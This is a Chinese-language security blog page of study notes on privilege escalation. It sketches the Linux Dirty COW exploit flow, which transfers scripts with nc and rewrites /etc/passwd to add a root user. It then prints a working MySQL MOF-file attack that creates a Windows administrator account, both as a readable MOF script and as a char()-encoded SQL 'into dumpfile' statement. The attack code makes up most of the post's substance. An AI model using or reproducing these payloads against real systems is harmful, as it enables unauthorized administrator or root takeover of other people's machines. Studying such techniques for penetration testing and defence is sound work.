<!DOCTYPE HTML>
<html>
<head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="chrome=1">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no">

    

    <title>提权 | 2h0nG&#39;s Blog</title>
    <meta name="author" content="John Doe">
    
    <meta name="description" content="Love is friendship fell into love">
    
    
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">

    <meta property="og:title" content="提权"/>
    <meta property="og:site_name" content="2h0nG&#39;s Blog"/>

    
    <meta property="og:image" content=""/>
    

    <link rel="icon" type="image/png" href="/favicon.png">
    <link rel="alternate" href="/atom.xml" title="2h0nG&#39;s Blog" type="application/atom+xml">
    <link rel="stylesheet" href="/css/lib/materialize.min.css">
    <link rel="stylesheet" href="/css/lib/font-awesome.min.css">
    <link rel="stylesheet" href="/css/style.css" media="screen" type="text/css">

    
        <link rel="stylesheet" href="/css/lib/prettify-tomorrow-night-eighties.css" type="text/css">
    
    <!--[if lt IE 9]><script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script><![endif]-->
<meta name="generator" content="Hexo 5.0.0"></head>


<body>
    <img src="/weixin_favicon.png" style="position: absolute; left: -9999px; opacity: 0; filter: alpha(opacity=0);">

    <nav class="indigo">
    <div class="nav-wrapper">
        <a href="#" data-activates="main-menu" class="button-collapse">
            <i class="fa fa-navicon"></i>
        </a>
        <div class="">
            <a href="/" class="brand-logo hide-on-med-and-down">2h0nG&#39;s Blog</a>
            <ul class="right hide-on-med-and-down">
                
                    <li>
                        <a class="menu-home " href="/" >
                            <i class="fa fa-home "></i>
                            
                            首页
                        </a>
                    </li>
                
                    <li>
                        <a class="menu-archive " href="/archives" >
                            <i class="fa fa-archive "></i>
                            
                            归档
                        </a>
                    </li>
                
                    <li>
                        <a class="menu-category category-menu" href="javascript:;" data-activates="category-menu" >
                            <i class="fa fa-bookmark "></i>
                            
                            分类
                        </a>
                    </li>
                
                    <li>
                        <a class="menu-reading " href="/reading" >
                            <i class="fa fa-book "></i>
                            
                            读书
                        </a>
                    </li>
                
                    <li>
                        <a class="menu-about " href="/about" >
                            <i class="fa fa-user "></i>
                            
                            关于
                        </a>
                    </li>
                
                    <li>
                        <a class="menu-search modal-trigger " href="#search" >
                            <i class="fa fa-search "></i>
                            
                            搜索
                        </a>
                    </li>
                
            </ul>
            <div>
    <ul class="side-nav indigo darken-1" id="main-menu">
        
        <li class="side-user">
            <div class="row">
                <div class="col s4 no-padding">
                    <img class="avatar-image circle responsive-img" src="http://ww2.sinaimg.cn/small/74990035jw1f1rjkd681bj20rs0rsdhg.jpg" alt="User Avatar">
                </div>
                <div class="info col s8 valign-wrapper no-padding">
                    <div class="valign">
                        <p class="name">2h0nG</p>
                        <p class="desc">不断学习中</p>
                    </div>
                </div>
            </div>
        </li>
        

        
            <li class="no-padding">
                <a class="waves-effect menu-home " href="/" >
                    <i class="fa fa-home "></i>
                    
                    首页
                </a>
            </li>
        
            <li class="no-padding">
                <a class="waves-effect menu-archive " href="/archives" >
                    <i class="fa fa-archive "></i>
                    
                    归档
                </a>
            </li>
        
            <li class="no-padding">
                <a class="waves-effect menu-category category-menu" href="javascript:;" data-activates="category-menu" >
                    <i class="fa fa-bookmark "></i>
                    
                    分类
                </a>
            </li>
        
            <li class="no-padding">
                <a class="waves-effect menu-reading " href="/reading" >
                    <i class="fa fa-book "></i>
                    
                    读书
                </a>
            </li>
        
            <li class="no-padding">
                <a class="waves-effect menu-about " href="/about" >
                    <i class="fa fa-user "></i>
                    
                    关于
                </a>
            </li>
        
            <li class="no-padding">
                <a class="waves-effect menu-search modal-trigger " href="#search" >
                    <i class="fa fa-search "></i>
                    
                    搜索
                </a>
            </li>
        
    </ul>

    <ul class="side-nav indigo darken-1" id="category-menu">
    

            

            <li class="collapse-level-0" collapse-level="0">
                <a class="no-padding" href="/categories/数据通信安全/">
                    数据通信安全 <span class="right">30 篇</span></a>
                </a>
            </li>

        

            <li class="collapse-level-0" collapse-level="0">
                <a class="no-padding" href="/categories/代码审计安全/">
                    代码审计安全 <span class="right">9 篇</span></a>
                </a>
            </li>

        

            <li class="collapse-level-0" collapse-level="0">
                <a class="no-padding" href="/categories/Linux系统安全/">
                    Linux系统安全 <span class="right">12 篇</span></a>
                </a>
            </li>

        

            <li class="collapse-level-0" collapse-level="0">
                <a class="no-padding" href="/categories/Web渗透测试/">
                    Web渗透测试 <span class="right">23 篇</span></a>
                </a>
            </li>

        

            <li class="collapse-level-0" collapse-level="0">
                <a class="no-padding" href="/categories/CTF笔记/">
                    CTF笔记 <span class="right">13 篇</span></a>
                </a>
            </li>

        

            <li class="collapse-level-0" collapse-level="0">
                <a class="no-padding" href="/categories/Python学习/">
                    Python学习 <span class="right">3 篇</span></a>
                </a>
            </li>

        

            <li class="collapse-level-0" collapse-level="0">
                <a class="no-padding" href="/categories/Leetcode题解/">
                    Leetcode题解 <span class="right">24 篇</span></a>
                </a>
            </li>

        

            <li class="collapse-level-0" collapse-level="0">
                <a class="no-padding" href="/categories/漏洞复现与分析/">
                    漏洞复现与分析 <span class="right">1 篇</span></a>
                </a>
            </li>

        

    </ul>
</div>

        </div>
    </div>
</nav>

<div id="search" class="modal search-modal">
    <div class="row">
        <div class="input-field col s12">
              <input id="search-input" type="text">
              <label for="search-input">搜索</label>
        </div>

    </div>
    <div id="search-result" class="search-result col s12">

    </div>
</div>


    <main>
        <div class="container main-container">
    <nav class="page-nav hide-on-small-only">
    <div class="nav-wrapper indigo">
        <span class="breadcrumb">当前位置（分类目录）</span>
        
            
    
    
    <a class="breadcrumb" href="/categories/Web渗透测试/">Web渗透测试</a>


        

        
    </div>
</nav>

<article>
    <div class="card">
        <div class="card-content">
            

            <div class="article-title">
                
    
        <h1>提权</h1>
    


            </div>
            <time class="pink-link-context" datetime="2020-09-30T05:04:16.000Z"><a href="/2020/09/30/%E9%98%B6%E6%AE%B5%E5%9B%9B%E3%80%81Web%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/%E6%8F%90%E6%9D%83/">2020-09-30</a></time>

            <span id="busuanzi_container_page_pv" class="read-times-container">
    <i class="fa fa-eye"></i>
    <span id="busuanzi_value_page_pv"></span>
</span>

            
    <div class="tags-row">
        
            <a href="/tags/Web渗透测试/" class="chip pink lighten-1">Web渗透测试</a>
        
    </div>


            <div class="toc pink-link-context hide-on-med-and-down">
    <ol class="section table-of-contents"><li class="section table-of-contents-item section table-of-contents-level-2"><a class="section table-of-contents-link" href="#%E6%8F%90%E6%9D%83"><span class="section table-of-contents-text">提权</span></a><ol class="section table-of-contents-child"><li class="section table-of-contents-item section table-of-contents-level-3"><a class="section table-of-contents-link" href="#%E4%B8%80%E3%80%81Linux%E5%B8%B8%E8%A7%81%E6%8F%90%E6%9D%83"><span class="section table-of-contents-text">一、Linux常见提权</span></a></li><li class="section table-of-contents-item section table-of-contents-level-3"><a class="section table-of-contents-link" href="#%E4%BA%8C%E3%80%81Mysql%E6%8F%90%E6%9D%83"><span class="section table-of-contents-text">二、Mysql提权</span></a><ol class="section table-of-contents-child"><li class="section table-of-contents-item section table-of-contents-level-4"><a class="section table-of-contents-link" href="#1%E3%80%81MOF%E6%96%87%E4%BB%B6%E6%8F%90%E6%9D%83"><span class="section table-of-contents-text">1、MOF文件提权</span></a></li><li class="section table-of-contents-item section table-of-contents-level-4"><a class="section table-of-contents-link" href="#2%E3%80%81udf%E6%8F%90%E6%9D%83"><span class="section table-of-contents-text">2、udf提权</span></a></li></ol></li></ol></li></ol>
</div>


            <div class="entry pink-link-context">
                <h2 id="提权"><a href="#提权" class="headerlink" title="提权"></a>提权</h2><h3 id="一、Linux常见提权"><a href="#一、Linux常见提权" class="headerlink" title="一、Linux常见提权"></a>一、Linux常见提权</h3><blockquote>
<p>黑白之道—红队测试之Linux提权小结：<a target="_blank" rel="noopener" href="https://mp.weixin.qq.com/s/BOCQoZLK_IXKXIqzFA4yFA">https://mp.weixin.qq.com/s/BOCQoZLK_IXKXIqzFA4yFA</a></p>
</blockquote>
<ol>
<li><p>内核漏洞</p>
</li>
<li><p>定时任务</p>
</li>
<li><p>Suid文件</p>
</li>
<li><p>Sudo 配置错误</p>
</li>
<li><p>NFS共享</p>
</li>
<li><p>第三方服务</p>
</li>
</ol>
<p>1、Linux内核提权漏洞—“脏牛”</p>
<blockquote>
<p>辅助工具：<a target="_blank" rel="noopener" href="https://github.com/mzet-/linux-exploit-suggester">https://github.com/mzet-/linux-exploit-suggester</a></p>
</blockquote>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">1、小可怜 nc -l 2333 &gt; 获得脚本.py</span><br><span class="line">2、攻击人 nc 小可怜IP 2333 &lt; 送过去脚本.py</span><br><span class="line">3、小可怜运行脚本，发现了有脏牛漏洞[CVE-2016-5195] dirtycow</span><br><span class="line">4、searchsploit dirty Cow     <span class="comment">#通过攻击人的exploit-db数据库搜索并获得脏牛漏洞exp</span></span><br><span class="line">5、用nc的方式传过去</span><br><span class="line">6、小可怜编译运行，让你输入一个密码，成功篡改了/etc/passwd，在其中增加了firefart超级用户，并备份了原来的/etc/passwd.bak，并且脚本提示在工作完毕请mv /etc/passwd.bak /etc/passwd 恢复现场。</span><br></pre></td></tr></table></figure>

<p>2、定时任务</p>
<blockquote>
<p>pspy监听进程辅助工具：<a target="_blank" rel="noopener" href="https://github.com/DominicBreuker/pspy">https://github.com/DominicBreuker/pspy</a></p>
</blockquote>
<p>3、Suid提权</p>
<blockquote>
<p>LinEnum.py：<a target="_blank" rel="noopener" href="https://github.com/rebootuser/LinEnum">https://github.com/rebootuser/LinEnum</a></p>
</blockquote>
<h3 id="二、Mysql提权"><a href="#二、Mysql提权" class="headerlink" title="二、Mysql提权"></a>二、Mysql提权</h3><h4 id="1、MOF文件提权"><a href="#1、MOF文件提权" class="headerlink" title="1、MOF文件提权"></a>1、MOF文件提权</h4><p>​    mof是Windows系统的一个文件，位于c:windows\system32\wbem\mofnullevt.mof，叫做托管对象格式， 它的作用是每隔5秒，就会去监控进程的创建和死亡。mof提权的简单利用过程就是，拥有了MySQL的root权限 后，使用root权限去执行上传操作，将我们重新改写过的mof文件上传，之后，这个文件会被服务器每隔5秒 以system权限执行。这个改写的mof中，有一段是vbs脚本，这个vbs大多数是cmd的添加管理员用户的命令</p>
<p>​    可以提权的根本原因是因为有一个更高权限的线程执行了命令。我们这里nullevt.mof文件的加载过程由system 用户执行，因此我们可以最高把用户的权限提升到system。</p>
<p><strong>利用条件</strong></p>
<ul>
<li>Windows版本&lt;=2003</li>
<li>c:windowssystem32wbemmof目录可写入</li>
<li>数据库允许外连，且已知root账号密码</li>
</ul>
<p><strong>利用代码</strong></p>
<figure class="highlight vbscript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"># pragma namespace(<span class="string">&quot;\.rootsubscription&quot;</span>)</span><br><span class="line"></span><br><span class="line">instance of **EventFilter as $EventFilter&#123;    EventNamespace = <span class="string">&quot;RootCimv2&quot;</span>;    Name  = <span class="string">&quot;filtP2&quot;</span>;    Query = <span class="string">&quot;Select * From **InstanceModificationEvent &quot;</span></span><br><span class="line">            <span class="string">&quot;Where TargetInstance Isa &quot;</span>Win32_LocalTime<span class="string">&quot; &quot;</span></span><br><span class="line">            <span class="string">&quot;And TargetInstance.Second = 5&quot;</span>;</span><br><span class="line">    QueryLanguage = <span class="string">&quot;WQL&quot;</span>;</span><br><span class="line">&#125;;</span><br><span class="line"></span><br><span class="line">instance of ActiveScriptEventConsumer as $Consumer</span><br><span class="line">&#123;</span><br><span class="line">    Name = <span class="string">&quot;consPCSV2&quot;</span>;</span><br><span class="line">    ScriptingEngine = <span class="string">&quot;JScript&quot;</span>;</span><br><span class="line">    ScriptText =</span><br><span class="line">    <span class="string">&quot;var WSH = new ActiveXObject(&quot;</span>WScript.Shell<span class="string">&quot;)nWSH.run(&quot;</span>net.exe user admin admin /add<span class="string">&quot;)&quot;</span>;</span><br><span class="line">&#125;;</span><br><span class="line"></span><br><span class="line">instance of __FilterToConsumerBinding</span><br><span class="line">&#123;</span><br><span class="line">    Consumer   = $Consumer;</span><br><span class="line">    <span class="built_in">Filter</span> = $EventFilter;</span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure>

<p>其中的关键就在于第14行的“net.exe user admin admin /add”，这句是用来创建一个用户名为admin，密码为admin的用户，创建成功后，再将这句命令改为 “net.exe localgroup administrators admin /add”后，再次上传，达到创建admin用户并将其加入administrators组的目的。</p>
<p><strong>利用过程</strong></p>
<p><u>0x0、拥有网站webshell时</u></p>
<p>如果已经得到了该网站的webshell，那么可以将nullevt.mof文件上传到c盘的的可写目录xxx，然后执行下面的SQL命令即可</p>
<blockquote>
<p>select load_file(‘c:xxxnullevt.mof’) into dumpfile ’c:\\windows\system32\wbem\mofnullevt.mof’;</p>
</blockquote>
<p>这里可以看下dumpfile与outfile的区别，对于outfile来说，into outfile会自动添加换行符等操作，适用于文本文件，不适合于代码。因为会产生冗余数据，会导致我们的命令执行 失败。而into dumpfile是将文件以二进制的方式写入，因此这里我们用into dumpfile。</p>
<p><u>0x1、未拥有网站webshell时</u></p>
<p>对于没有网站webshell的情况，我们可以采取连接数据库后直接写入的方式，将代码转换为ASCII码后，直接传入。</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> <span class="built_in">char</span>(<span class="number">35</span>,<span class="number">112</span>,<span class="number">114</span>,<span class="number">97</span>,<span class="number">103</span>,<span class="number">109</span>,<span class="number">97</span>,<span class="number">32</span>,<span class="number">110</span>,<span class="number">97</span>,<span class="number">109</span>,<span class="number">101</span>,<span class="number">115</span>,<span class="number">112</span>,<span class="number">97</span>,<span class="number">99</span>,<span class="number">101</span>,<span class="number">40</span>,<span class="number">34</span>,<span class="number">92</span>,<span class="number">92</span>,<span class="number">92</span>,<span class="number">92</span>,<span class="number">46</span>,<span class="number">92</span>,<span class="number">92</span>,<span class="number">114</span>,<span class="number">111</span>,<span class="number">111</span>,<span class="number">116</span>,<span class="number">92</span>,<span class="number">92</span>,<span class="number">115</span>,<span class="number">117</span>,<span class="number">98</span>,<span class="number">115</span>,<span class="number">99</span>,<span class="number">114</span>,<span class="number">105</span>,<span class="number">112</span>,<span class="number">116</span>,<span class="number">105</span>,<span class="number">111</span>,<span class="number">110</span>,<span class="number">34</span>,<span class="number">41</span>,<span class="number">13</span>,<span class="number">10</span>,<span class="number">13</span>,<span class="number">10</span>,<span class="number">105</span>,<span class="number">110</span>,<span class="number">115</span>,<span class="number">116</span>,<span class="number">97</span>,<span class="number">110</span>,<span class="number">99</span>,<span class="number">101</span>,<span class="number">32</span>,<span class="number">111</span>,<span class="number">102</span>,<span class="number">32</span>,<span class="number">95</span>,<span class="number">95</span>,<span class="number">69</span>,<span class="number">118</span>,<span class="number">101</span>,<span class="number">110</span>,<span class="number">116</span>,<span class="number">70</span>,<span class="number">105</span>,<span class="number">108</span>,<span class="number">116</span>,<span class="number">101</span>,<span class="number">114</span>,<span class="number">32</span>,<span class="number">97</span>,<span class="number">115</span>,<span class="number">32</span>,<span class="number">36</span>,<span class="number">69</span>,<span class="number">118</span>,<span class="number">101</span>,<span class="number">110</span>,<span class="number">116</span>,<span class="number">70</span>,<span class="number">105</span>,<span class="number">108</span>,<span class="number">116</span>,<span class="number">101</span>,<span class="number">114</span>,<span class="number">13</span>,<span class="number">10</span>,<span class="number">123</span>,<span class="number">13</span>,<span class="number">10</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">69</span>,<span class="number">118</span>,<span class="number">101</span>,<span class="number">110</span>,<span class="number">116</span>,<span class="number">78</span>,<span class="number">97</span>,<span class="number">109</span>,<span class="number">101</span>,<span class="number">115</span>,<span class="number">112</span>,<span class="number">97</span>,<span class="number">99</span>,<span class="number">101</span>,<span class="number">32</span>,<span class="number">61</span>,<span class="number">32</span>,<span class="number">34</span>,<span class="number">82</span>,<span class="number">111</span>,<span class="number">111</span>,<span class="number">116</span>,<span class="number">92</span>,<span class="number">92</span>,<span class="number">67</span>,<span class="number">105</span>,<span class="number">109</span>,<span class="number">118</span>,<span class="number">50</span>,<span class="number">34</span>,<span class="number">59</span>,<span class="number">13</span>,<span class="number">10</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">78</span>,<span class="number">97</span>,<span class="number">109</span>,<span class="number">101</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">61</span>,<span class="number">32</span>,<span class="number">34</span>,<span class="number">102</span>,<span class="number">105</span>,<span class="number">108</span>,<span class="number">116</span>,<span class="number">80</span>,<span class="number">50</span>,<span class="number">34</span>,<span class="number">59</span>,<span class="number">13</span>,<span class="number">10</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">81</span>,<span class="number">117</span>,<span class="number">101</span>,<span class="number">114</span>,<span class="number">121</span>,<span class="number">32</span>,<span class="number">61</span>,<span class="number">32</span>,<span class="number">34</span>,<span class="number">83</span>,<span class="number">101</span>,<span class="number">108</span>,<span class="number">101</span>,<span class="number">99</span>,<span class="number">116</span>,<span class="number">32</span>,<span class="number">42</span>,<span class="number">32</span>,<span class="number">70</span>,<span class="number">114</span>,<span class="number">111</span>,<span class="number">109</span>,<span class="number">32</span>,<span class="number">95</span>,<span class="number">95</span>,<span class="number">73</span>,<span class="number">110</span>,<span class="number">115</span>,<span class="number">116</span>,<span class="number">97</span>,<span class="number">110</span>,<span class="number">99</span>,<span class="number">101</span>,<span class="number">77</span>,<span class="number">111</span>,<span class="number">100</span>,<span class="number">105</span>,<span class="number">102</span>,<span class="number">105</span>,<span class="number">99</span>,<span class="number">97</span>,<span class="number">116</span>,<span class="number">105</span>,<span class="number">111</span>,<span class="number">110</span>,<span class="number">69</span>,<span class="number">118</span>,<span class="number">101</span>,<span class="number">110</span>,<span class="number">116</span>,<span class="number">32</span>,<span class="number">34</span>,<span class="number">13</span>,<span class="number">10</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">34</span>,<span class="number">87</span>,<span class="number">104</span>,<span class="number">101</span>,<span class="number">114</span>,<span class="number">101</span>,<span class="number">32</span>,<span class="number">84</span>,<span class="number">97</span>,<span class="number">114</span>,<span class="number">103</span>,<span class="number">101</span>,<span class="number">116</span>,<span class="number">73</span>,<span class="number">110</span>,<span class="number">115</span>,<span class="number">116</span>,<span class="number">97</span>,<span class="number">110</span>,<span class="number">99</span>,<span class="number">101</span>,<span class="number">32</span>,<span class="number">73</span>,<span class="number">115</span>,<span class="number">97</span>,<span class="number">32</span>,<span class="number">92</span>,<span class="number">34</span>,<span class="number">87</span>,<span class="number">105</span>,<span class="number">110</span>,<span class="number">51</span>,<span class="number">50</span>,<span class="number">95</span>,<span class="number">76</span>,<span class="number">111</span>,<span class="number">99</span>,<span class="number">97</span>,<span class="number">108</span>,<span class="number">84</span>,<span class="number">105</span>,<span class="number">109</span>,<span class="number">101</span>,<span class="number">92</span>,<span class="number">34</span>,<span class="number">32</span>,<span class="number">34</span>,<span class="number">13</span>,<span class="number">10</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">34</span>,<span class="number">65</span>,<span class="number">110</span>,<span class="number">100</span>,<span class="number">32</span>,<span class="number">84</span>,<span class="number">97</span>,<span class="number">114</span>,<span class="number">103</span>,<span class="number">101</span>,<span class="number">116</span>,<span class="number">73</span>,<span class="number">110</span>,<span class="number">115</span>,<span class="number">116</span>,<span class="number">97</span>,<span class="number">110</span>,<span class="number">99</span>,<span class="number">101</span>,<span class="number">46</span>,<span class="number">83</span>,<span class="number">101</span>,<span class="number">99</span>,<span class="number">111</span>,<span class="number">110</span>,<span class="number">100</span>,<span class="number">32</span>,<span class="number">61</span>,<span class="number">32</span>,<span class="number">53</span>,<span class="number">34</span>,<span class="number">59</span>,<span class="number">13</span>,<span class="number">10</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">81</span>,<span class="number">117</span>,<span class="number">101</span>,<span class="number">114</span>,<span class="number">121</span>,<span class="number">76</span>,<span class="number">97</span>,<span class="number">110</span>,<span class="number">103</span>,<span class="number">117</span>,<span class="number">97</span>,<span class="number">103</span>,<span class="number">101</span>,<span class="number">32</span>,<span class="number">61</span>,<span class="number">32</span>,<span class="number">34</span>,<span class="number">87</span>,<span class="number">81</span>,<span class="number">76</span>,<span class="number">34</span>,<span class="number">59</span>,<span class="number">13</span>,<span class="number">10</span>,<span class="number">125</span>,<span class="number">59</span>,<span class="number">13</span>,<span class="number">10</span>,<span class="number">13</span>,<span class="number">10</span>,<span class="number">105</span>,<span class="number">110</span>,<span class="number">115</span>,<span class="number">116</span>,<span class="number">97</span>,<span class="number">110</span>,<span class="number">99</span>,<span class="number">101</span>,<span class="number">32</span>,<span class="number">111</span>,<span class="number">102</span>,<span class="number">32</span>,<span class="number">65</span>,<span class="number">99</span>,<span class="number">116</span>,<span class="number">105</span>,<span class="number">118</span>,<span class="number">101</span>,<span class="number">83</span>,<span class="number">99</span>,<span class="number">114</span>,<span class="number">105</span>,<span class="number">112</span>,<span class="number">116</span>,<span class="number">69</span>,<span class="number">118</span>,<span class="number">101</span>,<span class="number">110</span>,<span class="number">116</span>,<span class="number">67</span>,<span class="number">111</span>,<span class="number">110</span>,<span class="number">115</span>,<span class="number">117</span>,<span class="number">109</span>,<span class="number">101</span>,<span class="number">114</span>,<span class="number">32</span>,<span class="number">97</span>,<span class="number">115</span>,<span class="number">32</span>,<span class="number">36</span>,<span class="number">67</span>,<span class="number">111</span>,<span class="number">110</span>,<span class="number">115</span>,<span class="number">117</span>,<span class="number">109</span>,<span class="number">101</span>,<span class="number">114</span>,<span class="number">13</span>,<span class="number">10</span>,<span class="number">123</span>,<span class="number">13</span>,<span class="number">10</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">78</span>,<span class="number">97</span>,<span class="number">109</span>,<span class="number">101</span>,<span class="number">32</span>,<span class="number">61</span>,<span class="number">32</span>,<span class="number">34</span>,<span class="number">99</span>,<span class="number">111</span>,<span class="number">110</span>,<span class="number">115</span>,<span class="number">80</span>,<span class="number">67</span>,<span class="number">83</span>,<span class="number">86</span>,<span class="number">50</span>,<span class="number">34</span>,<span class="number">59</span>,<span class="number">13</span>,<span class="number">10</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">83</span>,<span class="number">99</span>,<span class="number">114</span>,<span class="number">105</span>,<span class="number">112</span>,<span class="number">116</span>,<span class="number">105</span>,<span class="number">110</span>,<span class="number">103</span>,<span class="number">69</span>,<span class="number">110</span>,<span class="number">103</span>,<span class="number">105</span>,<span class="number">110</span>,<span class="number">101</span>,<span class="number">32</span>,<span class="number">61</span>,<span class="number">32</span>,<span class="number">34</span>,<span class="number">74</span>,<span class="number">83</span>,<span class="number">99</span>,<span class="number">114</span>,<span class="number">105</span>,<span class="number">112</span>,<span class="number">116</span>,<span class="number">34</span>,<span class="number">59</span>,<span class="number">13</span>,<span class="number">10</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">83</span>,<span class="number">99</span>,<span class="number">114</span>,<span class="number">105</span>,<span class="number">112</span>,<span class="number">116</span>,<span class="number">84</span>,<span class="number">101</span>,<span class="number">120</span>,<span class="number">116</span>,<span class="number">32</span>,<span class="number">61</span>,<span class="number">13</span>,<span class="number">10</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">34</span>,<span class="number">118</span>,<span class="number">97</span>,<span class="number">114</span>,<span class="number">32</span>,<span class="number">87</span>,<span class="number">83</span>,<span class="number">72</span>,<span class="number">32</span>,<span class="number">61</span>,<span class="number">32</span>,<span class="number">110</span>,<span class="number">101</span>,<span class="number">119</span>,<span class="number">32</span>,<span class="number">65</span>,<span class="number">99</span>,<span class="number">116</span>,<span class="number">105</span>,<span class="number">118</span>,<span class="number">101</span>,<span class="number">88</span>,<span class="number">79</span>,<span class="number">98</span>,<span class="number">106</span>,<span class="number">101</span>,<span class="number">99</span>,<span class="number">116</span>,<span class="number">40</span>,<span class="number">92</span>,<span class="number">34</span>,<span class="number">87</span>,<span class="number">83</span>,<span class="number">99</span>,<span class="number">114</span>,<span class="number">105</span>,<span class="number">112</span>,<span class="number">116</span>,<span class="number">46</span>,<span class="number">83</span>,<span class="number">104</span>,<span class="number">101</span>,<span class="number">108</span>,<span class="number">108</span>,<span class="number">92</span>,<span class="number">34</span>,<span class="number">41</span>,<span class="number">92</span>,<span class="number">110</span>,<span class="number">87</span>,<span class="number">83</span>,<span class="number">72</span>,<span class="number">46</span>,<span class="number">114</span>,<span class="number">117</span>,<span class="number">110</span>,<span class="number">40</span>,<span class="number">92</span>,<span class="number">34</span>,<span class="number">110</span>,<span class="number">101</span>,<span class="number">116</span>,<span class="number">46</span>,<span class="number">101</span>,<span class="number">120</span>,<span class="number">101</span>,<span class="number">32</span>,<span class="number">108</span>,<span class="number">111</span>,<span class="number">99</span>,<span class="number">97</span>,<span class="number">108</span>,<span class="number">103</span>,<span class="number">114</span>,<span class="number">111</span>,<span class="number">117</span>,<span class="number">112</span>,<span class="number">32</span>,<span class="number">97</span>,<span class="number">100</span>,<span class="number">109</span>,<span class="number">105</span>,<span class="number">110</span>,<span class="number">105</span>,<span class="number">115</span>,<span class="number">116</span>,<span class="number">114</span>,<span class="number">97</span>,<span class="number">116</span>,<span class="number">111</span>,<span class="number">114</span>,<span class="number">115</span>,<span class="number">32</span>,<span class="number">97</span>,<span class="number">100</span>,<span class="number">109</span>,<span class="number">105</span>,<span class="number">110</span>,<span class="number">32</span>,<span class="number">47</span>,<span class="number">97</span>,<span class="number">100</span>,<span class="number">100</span>,<span class="number">92</span>,<span class="number">34</span>,<span class="number">41</span>,<span class="number">34</span>,<span class="number">59</span>,<span class="number">13</span>,<span class="number">10</span>,<span class="number">32</span>,<span class="number">125</span>,<span class="number">59</span>,<span class="number">13</span>,<span class="number">10</span>,<span class="number">13</span>,<span class="number">10</span>,<span class="number">105</span>,<span class="number">110</span>,<span class="number">115</span>,<span class="number">116</span>,<span class="number">97</span>,<span class="number">110</span>,<span class="number">99</span>,<span class="number">101</span>,<span class="number">32</span>,<span class="number">111</span>,<span class="number">102</span>,<span class="number">32</span>,<span class="number">95</span>,<span class="number">95</span>,<span class="number">70</span>,<span class="number">105</span>,<span class="number">108</span>,<span class="number">116</span>,<span class="number">101</span>,<span class="number">114</span>,<span class="number">84</span>,<span class="number">111</span>,<span class="number">67</span>,<span class="number">111</span>,<span class="number">110</span>,<span class="number">115</span>,<span class="number">117</span>,<span class="number">109</span>,<span class="number">101</span>,<span class="number">114</span>,<span class="number">66</span>,<span class="number">105</span>,<span class="number">110</span>,<span class="number">100</span>,<span class="number">105</span>,<span class="number">110</span>,<span class="number">103</span>,<span class="number">13</span>,<span class="number">10</span>,<span class="number">123</span>,<span class="number">13</span>,<span class="number">10</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">67</span>,<span class="number">111</span>,<span class="number">110</span>,<span class="number">115</span>,<span class="number">117</span>,<span class="number">109</span>,<span class="number">101</span>,<span class="number">114</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">61</span>,<span class="number">32</span>,<span class="number">36</span>,<span class="number">67</span>,<span class="number">111</span>,<span class="number">110</span>,<span class="number">115</span>,<span class="number">117</span>,<span class="number">109</span>,<span class="number">101</span>,<span class="number">114</span>,<span class="number">59</span>,<span class="number">13</span>,<span class="number">10</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">70</span>,<span class="number">105</span>,<span class="number">108</span>,<span class="number">116</span>,<span class="number">101</span>,<span class="number">114</span>,<span class="number">32</span>,<span class="number">61</span>,<span class="number">32</span>,<span class="number">36</span>,<span class="number">69</span>,<span class="number">118</span>,<span class="number">101</span>,<span class="number">110</span>,<span class="number">116</span>,<span class="number">70</span>,<span class="number">105</span>,<span class="number">108</span>,<span class="number">116</span>,<span class="number">101</span>,<span class="number">114</span>,<span class="number">59</span>,<span class="number">13</span>,<span class="number">10</span>,<span class="number">125</span>,<span class="number">59</span>) <span class="keyword">into</span> <span class="keyword">dumpfile</span>  <span class="string">&#x27;c:windowssystem32wbemmofnullevt.mof&#x27;</span>;</span><br></pre></td></tr></table></figure>

